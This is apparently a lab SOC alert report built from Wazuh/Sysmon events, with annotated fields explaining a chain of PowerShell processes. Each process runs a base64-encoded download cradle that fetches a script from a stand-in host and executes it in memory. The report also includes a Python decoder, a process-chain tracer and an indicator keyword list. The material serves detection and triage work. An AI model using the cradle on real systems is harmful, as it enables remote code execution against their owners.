data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:30.128 ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} ProcessId: 9136 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} ParentProcessId: 13544 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full EID 1 text. Three things stand out: powershell.exe appears twice on the command line (PowerShell launching PowerShell), the -NoLogo -NoProfile -EncodedCommand switches, and the base64 blob. The blob is the UTF-16LE script in base64 and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): a download cradle that fetches a script over HTTPS and runs it in memory, leaving nothing on disk. ParentCommandLine is identical, so each PowerShell launches the next with the same payload, which is why rule.firedtimes is 130. The host in the URL is what you block and hunt for in proxy and DNS logs; the process runs as a non-elevated local user (IntegrityLevel Medium).

data.win.eventdata.utcTime:  2025-04-24 22:56:30.128
Process creation time from Sysmon (UTC). Use this for the timeline; systemTime and timestamp are the logging and ingest times.

data.win.eventdata.processGuid:  {94294ddc-c19e-680a-fd0c-000000000e00}
Sysmon's unique process identifier. Unlike a PID it is never reused, so join on it. The later PowerShell alert on this page lists this exact value as its parentProcessGuid.

data.win.eventdata.processId:  9136
PID of the new powershell.exe. Good for live response on the box right now, unreliable for historical joins because PIDs recycle.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. The System32 path plus the Microsoft version strings show the binary is genuine; the abuse is in how it is invoked (living off the land).

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
PE version of the binary. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.

data.win.eventdata.description:  Windows PowerShell
PE version-resource string. Trivially editable by an attacker, so corroborate with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the same version resource.

data.win.eventdata.company:  Microsoft Corporation
Company string from the version resource. It does not prove the file is signed; check the Authenticode signature if that matters.

data.win.eventdata.originalFileName:  PowerShell.EXE
Name compiled into the PE. Key detections on this rather than the path: copy powershell.exe to notes.exe and OriginalFileName still reads PowerShell.EXE.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parsed command line. Decode the blob with [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('<blob>')) in PowerShell, or base64 -d | iconv -f UTF-16LE -t UTF-8 on Linux. It yields the DownloadString cradle described under the message field above.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process: the user's profile root, consistent with an interactive session rather than a service.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, HOST\user form. Attacker is the (workgroup) hostname, Attcker1 a local account.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's identifier for the logon session; every Sysmon event from this session carries the same value.

data.win.eventdata.logonId:  0x26584
Logon ID of the session this process runs in. Search Security 4624 for Logon ID 0x26584 to see when and how Attcker1 logged on (type 2 console, 10 RDP, ...).

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 = services, 1 and up = interactive desktops, so this ran in a logged-on user session, not from a service.

data.win.eventdata.integrityLevel:  Medium
Token integrity level. Medium = standard user, not elevated; High = UAC-elevated admin; System = services. Whatever the cradle pulls down runs as a normal user until it escalates.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image on disk; which algorithms appear is set in the Sysmon config. Confirm it is the stock powershell.exe for build 26100.3323, then pivot on the same hash across hosts.

data.win.eventdata.parentProcessGuid:  {94294ddc-c19b-680a-fa0c-000000000e00}
Sysmon GUID of the parent. Walk this back alert by alert until the parent is no longer powershell.exe; that first launcher (a document, script host, scheduled task, explorer) is the actual entry point.

data.win.eventdata.parentProcessId:  13544
Parent PID at creation time; use parentProcessGuid, not this, for joins.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Parent image: another powershell.exe.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Command line of the parent. Identical to the child's, down to the same encoded blob: PowerShell spawning PowerShell with the same payload.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account of the parent. Same user, so no privilege change across the spawn.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
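As a worked recommended action for this alert, an added Python example (not part of SOCscribe or Wazuh, and not code from this report's author) that decodes the -EncodedCommand blob and rebuilds the PowerShell parent/child chain from Sysmon EID 1 alerts. The two sample alert records are constructed from this report's own values (ProcessGuid, PID, parentProcessGuid, command line), reduced to the fields the helpers use; the indicator list is an assumption, a small starter set rather than a vetted rule.

```python
"""Decode -EncodedCommand and rebuild the PowerShell process chain from
Sysmon Event ID 1 alerts (added example for this report; not SOCscribe or
Wazuh code). Sample alerts are constructed from this report's values."""
import base64
from typing import Dict, List, Optional

# Base64 blob exactly as it appears in this report's EID 1 command lines.
PAYLOAD = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
PS = r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"'
CMD = f"{PS} {PS} -NoLogo -NoProfile -EncodedCommand {PAYLOAD}"

# Constructed from the two EID 1 alerts on this page, reduced to the fields
# the helpers below use.
SAMPLE_ALERTS: List[dict] = [
    {"processGuid": "{94294ddc-c19e-680a-fd0c-000000000e00}", "processId": 9136,
     "parentProcessGuid": "{94294ddc-c19b-680a-fa0c-000000000e00}",
     "parentProcessId": 13544, "commandLine": CMD},
    {"processGuid": "{94294ddc-c1a0-680a-ff0c-000000000e00}", "processId": 10052,
     "parentProcessGuid": "{94294ddc-c19e-680a-fd0c-000000000e00}",
     "parentProcessId": 9136, "commandLine": CMD},
]

# Assumed starter indicator list (download cradle + evasion switches); not a
# vetted detection rule.
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
              "Net.WebClient", "Invoke-WebRequest", "FromBase64String",
              "-NoProfile", "-WindowStyle Hidden", "Bypass")


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the argument of -EncodedCommand. powershell.exe accepts any
    prefix of the switch name (-e, -enc, -encoded ...) plus the alias -ec,
    with either '-' or '/' as the switch character."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        if name == "ec" or (name.startswith("e") and "encodedcommand".startswith(name)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """PowerShell base64-encodes the UTF-16LE bytes of the script. Restore
    padding first: operators often strip the trailing '=' characters."""
    b64 = b64.strip().strip("\"'")
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def triage(alert: dict) -> dict:
    """Decode the blob in one alert and report which indicators appear in
    the plain part of the command line or in the decoded script."""
    b64 = extract_encoded_command(alert["commandLine"])
    decoded = decode_encoded_command(b64) if b64 else ""
    plain = alert["commandLine"].replace(b64, "") if b64 else alert["commandLine"]
    haystack = (plain + " " + decoded).lower()
    hits = [ind for ind in INDICATORS if ind.lower() in haystack]
    return {"processId": alert["processId"], "decoded": decoded, "indicators": hits}


def ancestry(alerts: List[dict], process_guid: str) -> List[int]:
    """Walk parentProcessGuid links and return PIDs child-first. Join on the
    GUIDs (never reused) rather than PIDs (recycled). When the parent has no
    EID 1 alert of its own, its PID is still known from the child's
    parentProcessId, so it closes the chain."""
    by_guid: Dict[str, dict] = {a["processGuid"]: a for a in alerts}
    chain: List[int] = []
    seen = set()
    cur = by_guid.get(process_guid)
    while cur is not None and cur["processGuid"] not in seen:
        seen.add(cur["processGuid"])
        chain.append(cur["processId"])
        parent = by_guid.get(cur["parentProcessGuid"])
        if parent is None:
            chain.append(cur["parentProcessId"])
        cur = parent
    return chain


if __name__ == "__main__":
    for alert in SAMPLE_ALERTS:
        print(triage(alert))
    print("chain:", ancestry(SAMPLE_ALERTS, SAMPLE_ALERTS[-1]["processGuid"]))
```

Run against the two records, the decoder yields the DownloadString cradle for both, and the chain comes out as 10052 -> 9136 -> 13544, with 13544 taken from the child's parentProcessId because no EID 1 for it appears on this page. In production feed it every EID 1 from the host, then keep walking until the parent image is something other than powershell.exe.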

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:33.645+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:33.645+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  134
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535393.2866427
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
Sysmon wrote this event; same provider as the EID 1 alert above.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Sysmon Event ID (its own numbering). 11 = FileCreate. Sysmon logs only the creates its config includes (by path or extension), so the absence of an event is not the absence of a file.

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Task category; for Sysmon events it equals the event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:31.4169608Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350839
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:31.361 ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} ProcessId: 9136 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kiqaikxm.v25.ps1 CreationUtcTime: 2025-04-24 22:56:31.361 User: Attacker\Attcker1"
Full EID 11 text. The writer is the PID 9136 powershell.exe from the encoded-command alert above (same ProcessGuid), and the file is a __PSScriptPolicyTest_*.ps1 in the user's Temp folder: PowerShell writes one of these every time it starts, to test whether AppLocker or WDAC script enforcement applies, then deletes it. It is not a downloaded tool, so the T1105 label overstates what this event shows.

data.win.eventdata.utcTime:  2025-04-24 22:56:31.361
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c19e-680a-fd0c-000000000e00}
Same ProcessGuid as the PID 9136 process in the previous alert, which ties this file write to the encoded-command PowerShell.

data.win.eventdata.processId:  9136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file. The path casing differs from the EID 1 alert (C:\WINDOWS here, C:\Windows there); Windows paths are case-insensitive, so normalise before matching on them.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kiqaikxm.v25.ps1
Path of the file created. A __PSScriptPolicyTest_<random>.ps1 in %TEMP% is PowerShell's own startup probe for AppLocker/WDAC script enforcement, written and removed on every launch, not a dropped tool. Rule 92213 fires on any .ps1 landing in a Temp folder, so this alert mostly confirms the PowerShell launch. Keep the High on the encoded-command alert, treat this one as supporting evidence, and look instead for non-test files written by the same ProcessGuid.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:31.361
Creation timestamp stored on the file itself. Equal to utcTime means a brand-new file; earlier means an existing file was overwritten (or its timestamp was tampered with).

data.win.eventdata.user:  Attacker\\Attcker1
Account that wrote the file: the same non-elevated local user.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:36.197+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:36.197+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  131
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535396.2869192
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Sysmon Event ID (its own numbering, not the Security log's). 1 = Process Create.

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:33.6258405Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350866
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:32.452 ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} ProcessId: 10052 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} ParentProcessId: 9136 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Same encoded command a third time, now as PID 10052 whose parent is PID 9136, the process from the earlier PowerShell alert. The chain on this page is 13544 -> 9136 -> 10052, each powershell.exe launching the next with the identical DownloadString payload. Decode once, then pivot on the host in the URL and find the first non-PowerShell ancestor.

data.win.eventdata.utcTime:  2025-04-24 22:56:32.452
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a0-680a-ff0c-000000000e00}
Sysmon's never-reused process identifier for PID 10052.

data.win.eventdata.processId:  10052
PID of this third powershell.exe in the chain.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c19e-680a-fd0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:36.201+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:36.201+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  135
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535396.2877259
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

